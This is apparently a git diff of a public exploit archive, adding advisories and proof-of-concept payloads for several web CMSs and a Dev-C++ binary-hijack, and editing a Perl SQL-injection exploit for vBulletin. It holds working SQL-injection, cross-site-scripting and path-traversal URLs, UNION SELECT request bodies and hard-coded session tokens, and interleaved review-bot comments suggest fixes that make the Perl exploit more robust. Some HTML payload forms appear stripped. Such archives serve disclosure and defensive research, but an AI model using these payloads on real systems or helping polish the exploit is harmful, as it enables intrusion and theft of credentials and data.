diff --git a/files.csv b/files.csv
index 37d7f77c1..d736fd0c6 100755
--- a/files.csv
+++ b/files.csv
@@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port
 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
-34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
+34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
 34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
@@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port
 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
 34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0
 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0
+34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0
+34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0
+34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
+34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
+34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/php/webapps/34436.txt b/platforms/php/webapps/34436.txt
index 4d2b005a7..717eff1e7 100755
--- a/platforms/php/webapps/34436.txt
+++ b/platforms/php/webapps/34436.txt
@@ -4,7 +4,7 @@
 # Severity : High+/Critical
 # Reporter(s) : Mehdi Karout & Christian Galeone
 # Google Dork : inurl:wp/wp-content/force-download.php
-# Plugin Version : 1.1
+# Plugin Version : 0.2.3
 # Plugin Name : Download ShortCode
 # Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
 # Vendor Home : http://werdswords.com/
diff --git a/platforms/php/webapps/34526.pl b/platforms/php/webapps/34526.pl
index 0543d491b..c075ea5ee 100755
--- a/platforms/php/webapps/34526.pl
+++ b/platforms/php/webapps/34526.pl
@@ -6,8 +6,7 @@
 # Tested on: vBulletin 4.1.2
 # Usage: perl exploit.pl
 # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
-# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
-# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)
+# Vulnerability discovered by: D4rkB1t
 
 #!/usr/bin/env perl
 use LWP::UserAgent;
@@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#";
 sub request
 {
+ $req = HTTP::Request->new(GET => $ARGV[0]);
+ my $res1 = $ua->request($req);
+
 open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
 my $token = dumping("vbloginout.txt","token");
-
- if($token eq '')
+ if($token eq '' || $token eq 'guest')
 {
- print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
- #print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
- $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
+ print "SECURITYTOKEN not found!\n";
+ $token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
 print "Attempting using $token as token.\n";
 }
 else
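Review bot: The first added line assigns `$req` without `my`, while `$res1` on the very next line is lexical, so with no `use strict` in view this quietly creates or clobbers a package global; `my $req = HTTP::Request->new(GET => $ARGV[0]);` keeps the two declarations consistent, provided the later `$req->content($post)` in `request` (outside this hunk) sits in the same scope. The GET response is written to `vbloginout.txt` and parsed without checking `$res1->is_success`, so a transport failure is indistinguishable from a page that simply lacks the token and silently falls through to the hard-coded fallback on the `# HERE` line; a `warn` or `die` on `!$res1->is_success` would make that case visible. The unchecked bareword `open(FILE01, ...)` on the context line predates this commit but has the same silent-failure shape. `sub request` continues past the end of this hunk.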
@@ -48,7 +48,6 @@ sub request $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); - #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); @@ -57,11 +56,10 @@ sub request banner(); break; } - #print "Location: $location\n"; + my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); - #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); @@ -91,7 +89,6 @@ sub second_request $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); - #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); 
@@ -100,11 +97,10 @@ sub second_request banner(); exit(1); } - #print "Location: $location\n"; + my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); - #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); @@ -219,8 +215,6 @@ sub login(@) $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf="); $ua->cookie_jar({}); my $res = $ua->request($req); - #print "\n"; print $res->content; print "\n"; - open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2); request(); } diff --git a/platforms/php/webapps/34533.txt b/platforms/php/webapps/34533.txt new file mode 100755 index 000000000..e49c36a0b --- /dev/null +++ b/platforms/php/webapps/34533.txt @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/42764/info + +Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Auto CMS 1.6 is vulnerable; other versions may be affected. + +
+ + + +' /> + + + + + + + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/34534.txt b/platforms/php/webapps/34534.txt new file mode 100755 index 000000000..cbb3618bb --- /dev/null +++ b/platforms/php/webapps/34534.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/42766/info + +TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities. + +An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible. + +http://www.example.com/www/index.php?admin=1§ion=content&action=edit&id=PAGE_ID'+ANY_SQL +http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL +http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE +http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE + +
+ + + + + + + + + + + + +
+ + + +
+ + + + + + + + + + + + +http://www.example.com/www/index.php?admin=1§ion=language">&action=addLanguage + +
+ + +http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00 + +http://www.example.com/www/index.php?admin=1§ion=style&action=editStylesheet&name=./../../../../../../../tmp/test.php diff --git a/platforms/php/webapps/34535.txt b/platforms/php/webapps/34535.txt new file mode 100755 index 000000000..e0105b2d0 --- /dev/null +++ b/platforms/php/webapps/34535.txt @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/42767/info + +Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected. + +
+ + + + +' /> + + + + + + + + + + +
+ + +
+ +' /> + + + + + + + + + + + + + + + + + + + + + + + + + +
+
diff --git a/platforms/php/webapps/34536.txt b/platforms/php/webapps/34536.txt
new file mode 100755
index 000000000..a25454647
--- /dev/null
+++ b/platforms/php/webapps/34536.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/42773/info
+
+CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
+
+http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'">
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
+
+http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE
diff --git a/platforms/windows/remote/34532.c b/platforms/windows/remote/34532.c
new file mode 100755
index 000000000..f1738a022
--- /dev/null
+++ b/platforms/windows/remote/34532.c
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/42737/info
+
+Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
+
+Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
+
+/*
+Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
+Date: August 25, 2010
+Author: storm (storm@gonullyourself.org)
+Version: 4.9.9.2
+Tested on: Windows Vista SP2
+
+http://www.gonullyourself.org/
+
+gcc -o make.exe Dev-C++-Binary.c
+gcc -o mingw32-make.exe Dev-C++-Binary.c
+
+...and place in appropriate directory. Executes your code four times.
+
+Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
+
+*/
+
+#include
+
+int main()
+{
+ WinExec("calc", 0);
+ exit(0);
+ return 0;
+}
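Review bot: The `#include` directive on the new side has no header operand as rendered, and `exit(0)` is called with no `<stdlib.h>` in view, so the listing as shown does not compile; the header name was presumably lost in extraction (an angle-bracket include reads as an HTML tag to some renderers), which is worth confirming against the repository copy. `return 0;` after `exit(0);` is unreachable and can be dropped. The third advisory line spells the second affected binary `'minw32-make.exe'` while the comment block and both `gcc` lines spell it `mingw32-make.exe`; the advisory text should use one spelling. The seven `source:` preamble lines precede `/*`, which follows the archive's convention but means the file is not a compilable unit as committed.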